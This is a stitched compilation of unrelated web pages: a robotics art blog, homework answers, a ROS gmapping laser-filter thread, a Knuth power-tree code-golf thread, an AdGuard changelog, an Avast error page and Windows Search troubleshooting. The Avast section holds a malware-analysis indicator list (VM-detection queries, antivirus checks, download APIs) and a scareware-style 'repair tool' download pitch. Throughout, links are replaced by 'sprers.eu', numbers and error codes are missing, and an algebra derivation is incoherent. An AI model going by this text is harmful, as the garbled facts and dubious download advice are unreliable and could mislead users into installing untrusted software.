Yay! I’ve tested this conjecture exactly once, with a 100% success rate. So that’s good math in my books. I wish I could credit where I found this… but since it’s on my cheat sheet, I guess I’ll have to claim it as my own.
$\mathrm{e}^{\sqrt{2}}$
# Tentacle train
One of my “contracts” this last year was to build an animatronic tentacle for an art exhibition (see #dokumenta14). While it worked well when controlled with one’s own hands… it barely worked with the motors and electronics.
It’s the third week since the beginning of the exhibit I’ve been sharing with Valeria and some things have changed, been updated and the like.
First of the likes is the promised dipped skull and it’s development.
That was after 12 dips. I expected a particular kind of development, mostly that after enough layers some kind of face would be developed. Even, surprisingly, a nose! Though some more needs to be done… the mouth and the horn shouldn’t really be there at all.
Second of likes:
Maybe it’s part of the first likes. Either way it’s the parts that were dipped last week.
This is after the first cycle. They don’t really look spectacular in the first dippings, although you can see the skull then compared to the skull now.
Tomorrow, I will make another post about the upgrade to the animatronics.
$e^{\sqrt{2}}$
We had our official exhibition this past Friday. Everything went pretty well; my robots didn’t explode or burn anything down… Not that that should happen… but well, old machines can just… give up sometimes. I updated the dokumenta14 page with some photos… but here I’d like to post a video and a photo of what my robot actually does. There is also a little preview of what’s to come in the following weeks.
The videos came from Facebook and Jan Hendrik Neumann, but they’re some nice videos. I may replace them later.
And for the small preview, for next week.
# Mighty Max Lives 2/3
I’ve been workin’ away on projects and being a halfway good student… but terrible person. In the meantime I’ve managed to get something done on Mighty Max. My Smoothieboard 0X finally showed up and I got straight to work on putting it in place.
|
|
# Chapter 20 - Oxidation-Reduction Reactions - 20 Assessment: 60
The nitrogen atoms in hydrazine (N$_2$H$_4$) lose electrons (are oxidized) and are turned into N$_2$ (nitrogen gas).
#### Work Step by Step
N$_2$O$_4$ + 2N$_2$H$_4$ $\rightarrow$ 3N$_2$ + 4H$_2$O
|
|
anonymous one year ago Will medal and fan with testomonial (I'm so confused with this lol) What is the slope of the line passing through the points (1, –5) and (4, 1)? A. 2 B. -4/5 C.5/4 D.-2 By the way It didn't come with a graph.
1. Nnesha
$\huge\rm \frac{ y_2-y_1 }{ x_2-x_1 }$ formula to find slope
2. Nnesha
where the x's and y's are $(x_1, y_1)$, $(x_2, y_2)$ — plug them into the formula
3. anonymous
Okay ill try that
4. Nnesha
good, try it and let me know what you get :=)
5. anonymous
answer is 2! thank you so much :)
6. Nnesha
right :=) yw good job!
|
|
# Show Reference: "A computational study of multisensory maturation in the superior colliculus ({SC})"
A computational study of multisensory maturation in the superior colliculus (SC) Experimental Brain Research, Vol. 213, No. 2. (1 September 2011), pp. 341-349, doi:10.1007/s00221-011-2714-z by Cristiano Cuppini, Barry E. Stein, Benjamin A. Rowland, Elisa Magosso, Mauro Ursino
@article{cuppini-et-al-2011,
abstract = {Multisensory neurons in cat {SC} exhibit significant postnatal maturation. The first multisensory neurons to appear have large receptive fields ({RFs}) and cannot integrate information across sensory modalities. During the first several months of postnatal life {RFs} contract, responses become more robust and neurons develop the capacity for multisensory integration. Recent data suggest that these changes depend on both sensory experience and active inputs from association cortex. Here, we extend a computational model we developed (Cuppini et al. in Front Integr Neurosci 22: 4–6, 2010) using a limited set of biologically realistic assumptions to describe how this maturational process might take place. The model assumes that during early life, {cortical-SC} synapses are present but not active and that responses are driven by non-cortical inputs with very large {RFs}. Sensory experience is modeled by a training phase in which the network is repeatedly exposed to modality-specific and cross-modal stimuli at different locations. {Cortical-SC} synaptic weights are modified during this period as a result of Hebbian rules of potentiation and depression. The result is that {RFs} are reduced in size and neurons become capable of responding in adult-like fashion to modality-specific and cross-modal stimuli. Supported by {NIH} grants {NS036916} and {EY016716}.},
author = {Cuppini, Cristiano and Stein, Barry E. and Rowland, Benjamin A. and Magosso, Elisa and Ursino, Mauro},
day = {1},
doi = {10.1007/s00221-011-2714-z},
issn = {0014-4819},
journal = {Experimental Brain Research},
month = sep,
number = {2},
pages = {341--349},
posted-at = {2011-07-27 16:23:58},
priority = {3},
publisher = {Springer Berlin / Heidelberg},
title = {A computational study of multisensory maturation in the superior colliculus ({SC})},
url = {http://dx.doi.org/10.1007/s00221-011-2714-z},
volume = {213},
year = {2011}
}
The model due to Cuppini et al. develops low-level multisensory integration (spatial principle) such that integration happens only with higher-level input.
In their model, Hebbian learning leads to sharpening of receptive fields, overlap of receptive fields, and integration through higher-cognitive input.
|
|
Gmapping is adding extra points to my map that aren't from the laser scan.
I'm running gmapping using the SICK LMS1xx driver for the lidar scans and wheel encoders for odometry. I'm having a problem with gmapping adding points to the map that are outside of my walls and are not reported by the laser scanner. Please see the image in the link below for details:
I've tried adjusting almost all of the parameters and I even tried filtering the laser scan message but the points don't exist in the laser scan so there isn't really anything to filter out. Hector mapping doesn't have this problem. Any thoughts on what's going on?
------- Edit: -------------
While hector mapping creates better looking maps without this issue, gmapping creates more accurate maps due to the underlying particle filter. Therefore, I would like to use gmapping over hector.
To highlight the issue even more, here are two maps, one made with hector and one with gmapping. Gmapping is adding quite a few additional points to the map that are not included in the laser scan data.
Manually looking at the laser scan data, I can see that the min range is 0.0m and the max range is 12.17m, neither is close to my 50m laser maximum and both are well below the outlier points on the map which appear to be about 25m away from the robot. I also determined that the 0.0m points are not the problem by filtering those out.
Any further help is appreciated. Thanks.
This looks fairly normal to me. Your laser is returning a max range reading, so gmapping is clearing all the way out. This could be a valid reading because of something like a window, or a spurious reading because of something like a very reflective or nonreflective surface, or an object at a very shallow angle to the beam. Multiple views of the same area may help, but if hector mapping works better for you, then use that.
Thanks for the comments. I've edited my original post with more information. I don't believe that my laser is receiving a maximum range reading because I can't see it in the raw message, nor is there a point shown in RVIZ for the laser measurement at the gmapping outlier points. Any other thoughts?
If it's not the laser readings, I'm not sure what could be causing this. Watching the mapping progress in rviz might give some indication.
Have you tried adjusting the ~maxUrange and ~maxRange parameters, and adjusting their relative values?
From the documentation:
~maxUrange (float, default: 80.0) — The maximum usable range of the laser. A beam is cropped to this value.
~maxRange (float) — The maximum range of the sensor. If regions with no obstacles within the range of the sensor should appear as free space in the map, set maxUrange < maximum range of the real sensor <= maxRange.
I had tried adjusting those parameters. They can limit the outlier points but don't define them. If I lower my max ranges to a small value like 10, then I get no outliers. If I increase it up to 100, then the points don't extend out to 100 but remain at their normal ~25m mark.
How are you filtering out the 0.0m measurements? Maybe you or gmapping is setting those points to scan.range_max + 1 as in the laser scan range filter? Can you see any other conspicuous ranges, such as NaNs, infs, or -infs in the laser scan?
I filtered them through a script where I replace the 0's with something else. I've tried changing them to NaNs and also to something else like 40. What I discovered is that those 0's are not corresponding to the outlier points. I saw the outliers and some additional points out at 40.
I believe I have found my answer. In the sensor_msgs/LaserScan Message, there are parameters range_min and range_max. Some of my laser scan ranges were coming in under the range_min value (both 0.0 and others) and those are causing the outlier points. I don't know why this is happening, but it can be fixed either by changing the data to conform to the specified max and mins, or by changing the max and mins to conform to the data.
If anyone else in the future faces this problem, you may use code along the lines below to filter your laser scans; note that there are two options, and you can comment out the first to use the second.
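The original snippet did not survive here, so the following is a minimal reconstruction under my own assumptions (topic names, and the convention of pushing invalid readings to range_max + 1, as in the laser scan range filter mentioned above):
#!/usr/bin/env python
# republish a filtered scan so gmapping never sees readings outside [range_min, range_max]
import rospy
from sensor_msgs.msg import LaserScan

def callback(scan):
    # Option 1: make the data conform to the declared limits
    scan.ranges = [r if scan.range_min <= r <= scan.range_max
                   else scan.range_max + 1.0 for r in scan.ranges]
    # Option 2 (comment out Option 1 to use): widen the limits to fit the data
    # scan.range_min = min(r for r in scan.ranges if r > 0.0)
    # scan.range_max = max(scan.ranges)
    pub.publish(scan)

rospy.init_node('scan_filter')
pub = rospy.Publisher('scan_filtered', LaserScan, queue_size=10)
rospy.Subscriber('scan', LaserScan, callback)
rospy.spin()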
I'm using a YD Lidar and I was getting bad results in gmapping. It was mapping areas beyond walls as free space, as if it was seeing through walls. I used the LaserScanRangeFilter package and replaced the min & max values with NaN. The example yaml from the LRSF package shows using "inf" but "NaN" was what I needed.
Also setting maxRange and maxURange correctly (according to actual range of lidar) was necessary.
Hope this helps.
|
|
# Knuth's Power Tree
In The Art of Computer Programming, Knuth describes an algorithm to compute short addition chains. The algorithm works by computing a tree known as the Power Tree. The tree is rooted at 1, and each level is computed from the previous. Suppose we've computed level k. Then, for each node (n) in level k, and each ancestor (or self) a = 1, 2, ..., n of n, add the node n+a to level k+1 if it is not already in the tree; the parent of n+a is n.
Three important things to note:
• nodes should be visited in the order that they are created
• levels are to be computed one at a time (not recursively)
• traverse the ancestors from smallest to largest (or you end up with a familiar, but less optimal, tree)
A picture of the tree
Perhaps drawing this tree would be fun to golf? Hmm. At the least, the result would probably be a better-drawn tree. FWIW, 10 has 4 children.
1
|
2
/ \
3 4
/\ \
/ \ \
5 6 8
/ \ \\ \
/ | \\ \
/ | \\ \
7 10 9 12 16
/ / /\ \ \ \ \\
/ / / \ \ \ \ \\
14 11 13 15 20 18 24 17 32
Naive Python Implementation
Since my verbose description of the tree seems to be lacking, here's a naive Python implementation. I store the tree as a dictionary here, parent(x) := tree[x]. There's lots of fun optimization to be had here.
def chain(tree, x):
    c = [x]
    while x != 1:
        x = tree[x]
        c.append(x)
    return c[::-1]

tree = {1: None}
leaves = [1]
levels = 5
for _ in range(levels):
    newleaves = []
    for m in leaves:
        for i in chain(tree, m):
            if i + m not in tree:
                tree[i + m] = m
                newleaves.append(i + m)
    leaves = newleaves
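For instance, after building the 5-level tree above, a couple of quick lookups (my own check against the picture):
print(chain(tree, 17))   # [1, 2, 4, 8, 16, 17]
print(chain(tree, 15))   # [1, 2, 3, 5, 10, 15]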
Requirements
Your program should take one argument n, compute the complete tree with all integer nodes i with 0 <= i <= n, and then take input from the user. For each input, print out the path from the root to that input. If an input isn't an integer between 0 and n (inclusive), behavior is undefined. Terminate if the user inputs zero.
Example Session
./yourprogram 1000
?1000
1 2 3 5 10 15 25 50 75 125 250 500 1000
?79
1 2 3 5 7 14 19 38 76 79
?631
1 2 3 6 12 24 48 49 97 194 388 437 631
?512
1 2 4 8 16 32 64 128 256 512
?997
1 2 3 5 7 14 28 31 62 124 248 496 501 997
?0
• Please note: a tree of size n may not contain all numbers up to n. – Howard Jul 15 '11 at 8:11
• Is it a requirement to compute the /complete/ tree even though the output does not require all that information? – Thomas Eding Jul 24 '11 at 7:46
• Yeah, MtnViewMark's solution does not comply with that requirement. – boothby Jul 25 '11 at 7:32
• That interpretation of the requirement excludes any lazy language. Since the program doesn't actually use the complete tree, nothing will ever cause the computation to happen. See my expanded solution notes. I suppose one could compel a lazy language to write those results to /dev/null... but why? – MtnViewMark Jul 26 '11 at 2:57
### Ruby, ~~172~~ ~~148~~ ~~139~~ 137 characters
P={1=>[1]}
a=->k{P[k].map{|t|P[k+t]||=P[k]+[k+t]}}
P.keys.map{|v|a[v]}until(1..$*[0].to_i).all?{|u|P[u]}
STDIN.map{|l|p P[l.to_i]||break}
Most of the code is for input and output. Building the tree is only a few chars (lines 1-2). The tree is represented by a hash where the key is the node and the value is its path to the root. Since a tree of size n may not contain all numbers up to n, we continuously add more levels until all numbers up to n are present in the tree. For the example given above:
>1000
[1, 2, 3, 5, 10, 15, 25, 50, 75, 125, 250, 500, 1000]
>79
[1, 2, 3, 5, 7, 14, 19, 38, 76, 79]
>631
[1, 2, 3, 6, 12, 24, 48, 49, 97, 194, 388, 437, 631]
>512
[1, 2, 4, 8, 16, 32, 64, 128, 256, 512]
>0
Edit 1: Now the hash already contains the path for each node as its value, and therefore there is no need to build the path each time.
Edit 2: Changed the break condition for the final loop.
Edit 3: Changed the condition for the build-loop.
## Haskell, ~~195~~ ~~185~~ 174 characters
(%)=lookup
t(n,w)=map(\m->(n+m,n+m:w))w
_#0=return()
k#n=maybe(foldr(\e@(i,_)r->maybe(e:r)(\_->r)$i%r)k(k>>=t)#n)((>>main).print.reverse)$n%k
main=getLine>>=([(1,[1])]#).read
This version actually totally ignores the argument, and calculates the tree incrementally on demand.
1000
[1,2,3,5,10,15,25,50,75,125,250,500,1000]
79
[1,2,3,5,7,14,19,38,76,79]
631
[1,2,3,6,12,24,48,49,97,194,388,437,631]
512
[1,2,4,8,16,32,64,128,256,512]
997
[1,2,3,5,7,14,28,31,62,124,248,496,501,997]
0
Oh look! There wasn't any requirement to output a prompt. So now the code doesn't.
• Edit (195 → 185): combined main and i
• Edit (185 → 174): removed prompt
## Ungolf'd
Here is an expanded version of the core computation:
type KPTree = [(Int, [Int])]
-- an association from numbers to their ancestor chains
-- ancestor chains are stored biggest to smallest
-- the associations are ordered as in the tree, reading right to left,
-- from the lowest level up

kptLevels :: [KPTree]
kptLevels = [(1,[1])] : map expand kptLevels
-- a list of successive KPTrees, each one level deeper than the last
  where
    expand tree = foldr addIfMissing tree (concatMap nextLeaves tree)
    addIfMissing e@(n,_) tree = maybe (e:tree) (const tree) $ lookup n tree
    nextLeaves (n,w) = map (\m -> (n+m, n+m:w)) w

kptPath :: Int -> [Int]
kptPath n = findIn kptLevels
-- find the ancestor chain for a given number
  where
    findIn (k:ks) = maybe (findIn ks) id $ lookup n k
To illustrate the strangeness of how to apply the pre-computation requirement to a lazy language, consider this version of main:
kptComputeAllTo :: Int -> [[Int]]
kptComputeAllTo n = map kptPath [1..n]
-- compute all the paths for the first n integers

main :: IO ()
main = do
  n <- (read . head) `fmap` getArgs
  go $ kptComputeAllTo n
  where
    go preComputedResults = loop
      where
        loop = getLine >>= process . read
        process 0 = return ()
        process i = (print $ reverse $ preComputedResults !! (i - 1)) >> loop
Even though it builds an array of the results for the first n integers, only those that are used are ever actually computed! Here's how fast it runs with 50 million as an argument:
> (echo 1000; echo 0) | time ./3177-PowerTree 50000000
[1,2,3,5,10,15,25,50,75,125,250,500,1000]
0.09 real 0.07 user 0.00 sys
• This doesn't compute the complete tree with n nodes. – boothby Jul 25 '11 at 7:33
• It wasn't clear how to apply the requirements to a lazy language. Usually, an input value like this is given as a help so solutions can just allocate a fixed array. Solutions in dynamic languages often ignore such input (or limits in the spec). I took the input to be a hint to the program as a bound on subsequent inputs. Indeed a program that meets the input/output requirements of this problem needn't use it at all. Typically, code-golf doesn't mandate how the internals achieve the results. – MtnViewMark Jul 26 '11 at 1:58
• Fascinating. What kind of runtime do you get to compute the chain for 50M? The algorithm Knuth describes is O(n lg n) time and 2n+lg n space. – boothby Jul 26 '11 at 7:08
• The algorithm used was aiming for code-golf, not time efficiency: It is roughly O(n^3 lg n) in time, though oddly only O(n) in space. On my somewhat aging CPU, it can compute the chain for 10k in 9.58s, or just about 100x the time it took to compute the chain for 1k. I'm pretty sure computing the chain for 50M wouldn't be possible with this code. – MtnViewMark Jul 27 '11 at 4:31
• So, that's why I make the requirement that you compute the whole tree. The point of code-golf (IMO) is to satisfy all requirements in the smallest number of characters. If you're not satisfying all the requirements, it's a fail. – boothby Jul 27 '11 at 4:54
|
|
## College Algebra (10th Edition)
In order to count all of the elements in set $A$ but not in set $C$, we have to add up the numbers that are in $A$, not including those which are in $C$. This means: $15 + n(A\cap B\cap C) + n(A\cap B) + n(A\cap C) - n(A\cap B\cap C) - n(A\cap C) = 15 + n(A\cap B) = 15 + 3 = 18$
|
|
## An error 1006 has occurred avast
Runtime code 1006 happens when Avast! Antivirus fails or crashes while it's running, hence its name. It doesn't necessarily mean that the code itself is at fault; it's just that you don't know which of the solutions below will work for every occurrence of this error. Logic Error (EE) - the computer system creates incorrect information or produces a different result even though the data that is input is correct.
## Windows Release - AdGuard versions
One of the best things about Christmas is that everyone gives each other presents! So here’s our humble gift to you: AdGuard v for Windows. We hope you’ll like it, because we put a lot of effort into its development.
This version features improved ad blocking (thanks to added support for scriptlets and new modifiers), some major networking improvements and a new option to activate AdGuard via your sprers.eu personal account.
Scriptlets are a powerful ad-blocking instrument. You could say a scriptlet is an internal script (a mini-program) that we install with the app and then execute with the help of filtering rules. Putting it simply, scriptlets allow us to modify how the code of a web page behaves. In practical terms, this helps fight adblocker circumvention, for example, and is also useful in some other cases.
[Added] `$redirect` and `$rewrite` modifiers support
They are practically the same modifier, and they allow filter developers to substitute resources. If you are not a custom filtering rules aficionado, don't bother with it. Just know that it is yet another instrument in the hands of filter developers that helps block ads more efficiently.
We should mention that both `$redirect` and `$rewrite` modifiers still work somewhat in test mode, but they are fully operational and you should feel free to use them.
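For the curious, the rule syntax looks roughly like this (a hedged illustration only: `example.org` is a placeholder, and the scriptlet and redirect-resource names are drawn from AdGuard's public filter syntax rather than from this changelog, so treat the exact spelling as an assumption). A scriptlet rule such as `example.org#%#//scriptlet("abort-on-property-read", "someAdProperty")` injects the named mini-program into matching pages, while a redirect rule such as `||example.org/js/tracker.js$redirect=noopjs` substitutes the matched resource with a no-op stub.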
[Improved] Proxy mode can now be used alongside automatic traffic filtering #, #
Previously, you had to choose between using AdGuard to filter all traffic on the current system, or setting it up as an HTTP proxy to funnel traffic of particular apps or devices through AdGuard (but without filtering it).
Now you can have the best of both worlds, and even more: filter application and browser traffic on the current PC and at the same time use AdGuard as a filtering proxy for other devices (yes, now their traffic will be filtered too). To select the configuration you want, go to Network settings.
[Fixed] Disabling HTTPS filtering for an app works incorrectly #
[Fixed] Cookies time-to-live resets to zero #
[Fixed] Automatic apps filtering gets disabled after an app update #
[Fixed] Userscripts that worked in pre-version-7 releases do not work in post-version-7 releases #
[Fixed] Cannot find the file specified #
[Fixed] Incompatibility between AdGuard and HTTP Debugger #
[Fixed] Cannot add executable from %Appdata% to the filtering #
[Fixed] Some problems with user filter #
[Fixed] Cannot add `$network` rules to the user filter #
[Fixed] Atom package installer doesn't work when protection is enabled #
[Fixed] Firefox Private Network issue #
[Improved] Change the approach to the way we start the cert installer #
### UI
[Added] Add HTTPS filtering step to the initial wizard #
[Added] Import/export advanced settings #
[Added] Trial period should be started explicitly #
[Changed] Checkbox for a new rule is now shown as disabled in Filter editor #
[Fixed] Diagonal resizing by dragging the bottom corners is flawed #
[Fixed] Extra error entries in the log file #
[Fixed] Filter descriptions in Filter editor lack spaces in Traditional Chinese localization #
[Fixed] Main window now correctly reflects the time of the last filters update check and not the time of the last actual filters update #
[Fixed] Incorrect placement of proxy configuration warning #
[Fixed] UI performance drops when you use search on the "Add filter" screen #
[Fixed] Main window is shown next to the settings wizard #
[Fixed] Poor line break on Browsing Security screen #
[Fixed] Repeated clicks on "Debug mode" in tray menu bring up the slow filtering warning #
[Fixed] Buttons Collapse, Expand, Close look bad #
[Fixed] Userscript is reported as updated if version contains a letter #
[Fixed] Drag&Drop issue #
[Fixed] Filtering log doesn't show applied rules #
[Fixed] Dark theme inner window issue #
[Fixed] Wrong request type in the filtering log #
[Improved] Microsoft Edge Beta cannot be added to filtered apps in AFW #
[Improved] Remove old strings from translations #
[Improved] Improve the license check window #
[Improved] AdGuard Personal CA keeps coming back #
[Improved] Re-design "About" screen #
[Improved] There is no link to the list of changes in the latest versions #
[Improved] The text is not centered on the main screen #
[Improved] Use custom adguard: scheme for adding userscripts #
[Improved] Hover on maximize button looks bad #
[Improved] Strip identifying information from the logs when doing export #
[Improved] Centering of icons in Settings #
### Networking
[Changed] Legacy and regular Microsoft Edge executables separated in "Filtered Apps" #
[Improved] We should check internet availability before sending a support request #
### Other
[Added] New versioning system #
[Changed] Flag icons removed from the languages selector #
[Changed] "Too many filters" warning now requires more enabled filters to trigger #
[Fixed] Reset statistics feature works incorrectly #
[Fixed] Settings reset doesn't set window mode to its default state #
[Fixed] Unable to remove Spotify from the list of filtered apps #
[Fixed] Several apps with the same name can't be added to the list of filtered apps #
[Fixed] Crash after language change #
[Fixed] Filters metadata is not updated for some filters #
[Fixed] AdGuard occasionally doesn't delete old log files #
[Fixed] sprers.eu crashes on app uninstall #
[Fixed] File or folder is corrupted #
[Improved] AdGuard GUI unnecessarily raising Windows platform timer resolution #
[Improved] Transfer GM property when the user changes the userscript's name #
[Improved] Improve the Advanced Settings logic #
[Improved] Filter installer's crash report names #
[Improved] Pass the empty parameter's value in the query string #
[Improved] AdGuard now adapts its time & date format according to system settings #
### Incident Response
#### MITRE ATT&CK™ Techniques Detection
This report has 9 indicators that were mapped to 9 attack techniques and 6 tactics.
### Indicators

Not all malicious and suspicious indicators are displayed in this capture; the recoverable details are summarized below.

- Anti-Detection/Stealthiness: possibly checks for the presence of an antivirus engine (matched strings such as "Antivirus", "ZoneAlarm", "avastGuid", "avast_uuid"; string relevance 3/10; mapped to a MITRE ATT&CK™ technique).
- Environment Awareness: found a reference to a WMI query string known to be used for VM detection (for example "SELECT * FROM Win32_Process", "SELECT * FROM Win32_VideoController WHERE DeviceID='VideoController1'", and URL-encoded script fragments querying Win32_Process; string relevance 10/10; mapped to a MITRE ATT&CK™ technique).
- General / Network Related: found potential IP addresses in binary/memory (heuristic matches; string relevance 3/10).
- Remote Access Related / Spyware/Information Retrieval: found an instant-messenger-related domain (string relevance 10/10).
- Unusual Characteristics: found TLS callbacks; imports suspicious APIs (among others CryptEncrypt, OpenProcessToken, CheckRemoteDebuggerPresent, IsDebuggerPresent, CreateToolhelp32Snapshot, Process32FirstW/Process32NextW, DeviceIoControl, URLDownloadToFileW; static parser relevance 1/10); the PE file contains an unusual section name (".didat"; relevance 10/10).
- Environment Awareness / External Systems / General: contains SQL queries (CREATE TABLE / SELECT / DELETE / INSERT statements over tables such as ExeFiles, ActualProgramModifications, IgnoredPrograms, ProgramToEntriesMapping, CompanyInfoCache and MsiFileInfoCache; string relevance 2/10).
- Certificate Data: the input sample is signed with certificates issued by "CN=DigiCert SHA2 Assured ID Code Signing CA", "CN=DigiCert Assured ID Root CA" and "CN=Microsoft Code Verification Root" (relevance 10/10; mapped to a MITRE ATT&CK™ technique).
- Network Related: found potential URLs in binary/memory (build paths referencing Google protobuf sources under "s:\sources\sdk\vs\protobuf\", search-engine and safe-price URL patterns, and many heuristic domain matches, most of which are corrupted to "sprers.eu" in this capture; string relevance 10/10).

### File Details

### File Sections

The sample contains the sections .text, .rdata, .data, .didat, .rsrc and .reloc; the full report lists each section's entropy, virtual address, virtual size, raw size, MD5 and characteristics.

### File Resources

### File Imports

## How to fix the Runtime Code Avast! Antivirus Error

Last Updated: 01/09/21: An Android user voted that repair method 1 worked for them.

Recommended Repair Tool: This repair tool can fix common computer problems such as blue screens, crashes and freezes, and missing DLL files, as well as repair malware/virus damage and more by replacing damaged and missing system files.

###### STEP 1: Click Here to Download and install the Windows repair tool.

###### STEP 2: Click on Start Scan and let it analyze your device.

###### STEP 3: Click on Repair All to fix all of the issues it detected.
Compatibility Requirements: 1 GHz CPU, MB RAM, 40 GB HDD. This download offers unlimited scans of your Windows PC for free. Full system repairs start at $.
Article ID: ACXEN
Applies To: Windows 10, Windows , Windows 7, Windows Vista, Windows XP, Windows
##### Speed Up Tip #83
Setup Multiple Drives:
If you are an advanced user, you can boost your system performance by installing multiple hard drives in your computer. You can then configure these new drives as RAID 0 to create a fast single virtual drive, or set up RAID 5 or any of the other RAID configurations depending on your needs.
## Windows Search service does not start (Windows 7)
• Windows Search service does not start
The Windows Search service does not start. How can I solve this problem?
Hello
From the desktop, hold down the Windows key and press R. In the Run window, type services.msc and press Enter. Navigate down to the Windows Search service, right-click it and select Properties.
In the drop-down list next to Startup type, select Automatic (for Windows 8, select Automatic (Delayed Start)), then click Apply and then OK.
Restart the computer.
Kind regards
DP - K
• The Windows Search service could not create the search index, error 0xd66, failed to add the application, internal error
Events:
The most recent instance was on:
Search service error
Log name: Application
Source: Microsoft-Windows-search
Publication date:
Event ID:
Level: error
Keywords: Classic
Trial has been on:
Search service error
Previous info from event viewer.
Services:
Windows Search
Start the service
Error message:
Windows could not start the Windows Search service on the local computer. For a
non-Microsoft service, contact the service vendor and refer to the
service-specific error code.
Windows System log (in Event Viewer) for the date this first occurred:
Error from the Service Control Manager Eventlog Provider:
The Windows Search service terminated with service-specific error (0xD23).
Log name: System
Source: Service Control Manager
Date:
Event ID:
Level: error
Keywords: Classic
We are all ONE!
I tried some of the solutions you offered, but I think my problem was caused by having the index on an external hard drive: when the computer was restarted, the drive letter of the USB drive was not the same. If I remember well, the problem was that I was not able to rebuild the index.
I now have the index on my C drive, at the root level. I was about to point it to the other half of a 16 GB flash drive, which is also USB, but Windows Vista Home Premium would not allow it, because it appears that flash drives are considered removable, while external USB drives are not in that category.
Currently I have about 74 items indexed.
We are all ONE!
• The Windows 7 Search service does not start; the error references . How can I get this service started so my OneNote notebooks are available?
I am unable to get Windows Search to start from the administration panel. The error box refers to error code . I want to get this started so I can take advantage of OneNote's search functions.
Troubleshooting Windows 7 & Vista search & indexing errors
sprers.eu
You could look at resetting or rebuilding the search index.
How to use Indexing Options in Vista (and probably Win 7)
sprers.eucom/tutorials/sprers.eu
Try the system restore and the System File Checker.
How to repair the operating system and how to restore the configuration of the operating system to an earlier point in time in Windows Vista (or 7)
sprers.eu#appliesTo
How to analyze the log file entries that the Microsoft Windows Resource Checker (sprers.eu) program generates in Windows Vista
sprers.eu#appliesTo
How to troubleshoot a problem by performing a clean boot in Windows Vista or in Windows 7
sprers.eu
Try running ChkDsk to check your drive for errors. Right-click on your drive icon / Properties / Tools / Error checking. Try it first without checking either box (so it runs in read-only mode) to see if it reports any file or hard-drive problems. If so, rerun it with both boxes checked and restart to allow it to attempt to fix any problems found.
Are there problems with other services that may not be running?
• Windows Update service does not work and Outlook advanced search does not work
Have Vista Home Premium on an HP laptop. Running Norton Internet Security Antivirus and firewall.
A month ago I upgraded Office to Office .
With Office , I used to get a list of updates and I would choose which ones I wanted, but I noticed
recently that I get no updates online. When I click the button to run an update, nothing happens.
In addition, advanced search in Outlook does not work; it finishes in a microsecond and produces no results.
Tried changing updates to not update automatically, and then back to auto: no effect.
Tried going into safe mode and still couldn't do an update.
Have run CCleaner and a sprers.eu Windows repair: no effect.
Ran a repair on Office : no effect.
Have checked that Cryptographic Services, BITS and Windows Update are all in automatic mode and the services are started.
Have run the Fix it for update problems: no effect.
Ran the program and got: Windows Update Standalone Installer setup encountered an error 0xc
Ran sfc /scannow and it just brings up a search window without search results.
Have noticed in the Event Viewer:
In the Application logs:
The Cryptographic Services service failed to initialize the catalog database. The ESENT error is ID
I also get a warning on:
The Windows Search Service tries to remove the old catalog.
and a error:
The Windows Search Service cannot open the Jet property store.
Details: The content index server cannot update or access information because of a database error.
Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases, it may be necessary to delete and recreate the content index. (0xf)
and an error
The Windows Search Service was unable to create the search index. Internal error
and warning
Search is unable to complete the indexing of your Outlook data. Indexing cannot continue for
C:\Users\Bill\AppData\Local\Microsoft\Outlook\sprers.eu (error = 0x). If this error persists,
contact Microsoft Support.
And in the system logs:
Error
The Windows Search service terminated with service-specific error (0xD23).
Help. It's driving me crazy!
No probs.
Though this one is not specifically for your laptop, it has the Intel Rapid Storage chipset driver it uses (ICH8M-E/M SATA AHCI Controller); you can see it under the required system configuration
Here
This is for XP 32/64-bit, Vista 32/64-bit and Win7 32/64-bit.
It is version . It may not be the latest version out at the moment, but it is later than the version installed.
You can either double-click SP, then follow what it says on the screen, then restart. Then see if WU works.
Or extract SP with something like 7-Zip / WinRAR (select Extract to SP\), so it extracts the files into folders.
Then go to the SATA entry in Device Manager. Go to the Driver tab / Update Driver / Browse my computer / Let me pick.
Point to the folder that you extracted, then the drivers folder, then the x folder, since you are using the -bit version. Then click OK. It may show ICH8M-E/M (if it picks up previous drivers, or if there is already a controller entry for ICH8M-E/M). Press OK, then Next, to load the drivers for it. Once it has finished updating the SATA drivers, restart.
Looks like you need .NET Framework (or higher) for this if you double-click the file. I don't think you need it if you extract the file and then add it through Device Manager, though.
• Windows Search service will not work.
Windows Search service will not work. In the event log, it says "The Windows Search service terminated with service-specific error %
Hi Russ,
1. When was the last time it was working fine?
2. Did you make any recent changes to the computer?
3. Are you able to start the service manually?
I suggest that you try manually starting the Windows Search service and check if it works.
(a) Click Start, type services.msc in the search box, and then click OK.
(b) In the Services (Local) list, right-click Windows Search, and then click Properties.
(c) If the Startup type drop-down list is set to Disabled, select Automatic from the Startup type drop-down list, and then click OK.
(d) Click the File menu and then click Exit.
If the step above fails, check out the link below and run the Microsoft Fix it tool available there.
Windows search does not work and the search is slow or stops
sprers.eu?EntryPoint=lightbox
I hope this helps!
Halima S - Microsoft technical support.
• Windows Update cannot currently check for updates, because the service is not running; you may need to restart your computer
My computer fails to update via the Windows Update component.
Whenever I try to do a manual update using this component I get the message: *Windows Update cannot currently check for updates, because the service is not running. You may need to restart your computer*
My computer has a few updates pending, but cannot run these updates.
Whenever I try to run the updates at computer shutdown, they remain frozen for a while and stop without updating.
It starts to run update 1 of and stops.
If I shut down normally, the computer stays hanging for about 1 hour without stopping.
I would like to know how to solve this problem
Thank you
Regards
Hello
Were there any changes made to the computer before the issue appeared?
Perform the following methods and check:
Method 1:
I suggest you check whether you are able to access the Windows Update service, and ensure that the following services are started. If a service is not started, follow these steps:
a. Click Start, type services.msc and press Enter.
b. Search for Windows Update.
c. Right-click the service and select Properties.
d. In Startup type, select Automatic.
e. click Start under the Service status.
f. click OK.
g. Repeat steps c to f for the following services:
Background Intelligent Transfer Service
Cryptographic services
If the steps do not help to solve the problem, you can go ahead with the methods mentioned below and check.
Method 2:
How to reset the Windows Update components?
sprers.eu
Method 3:
Your antivirus software may be in conflict with Windows Update. You can test this by temporarily disabling your antivirus:
Disable the antivirus software
sprers.eu
Note: Antivirus software can help protect your computer against viruses and other security threats. In most cases, you should not disable your antivirus software. If you need to disable it temporarily to install other software, you must re-enable it as soon as you are finished. If you are connected to the Internet or a network while your antivirus software is disabled, your computer is vulnerable to attacks.
Method 4:
The problem with Microsoft Windows Update is not working
sprers.eu
sprers.eu
sprers.eu
I hope this helps.
• Error: Windows Update cannot currently check for updates because the service is not running; you must restart the computer. The Windows Update service does not work
Original title: Windows Update service is not running / working and is not listed in services.msc
When I go to Windows Update a red shield with a white cross appears, and when I click "check for updates" this message appears:
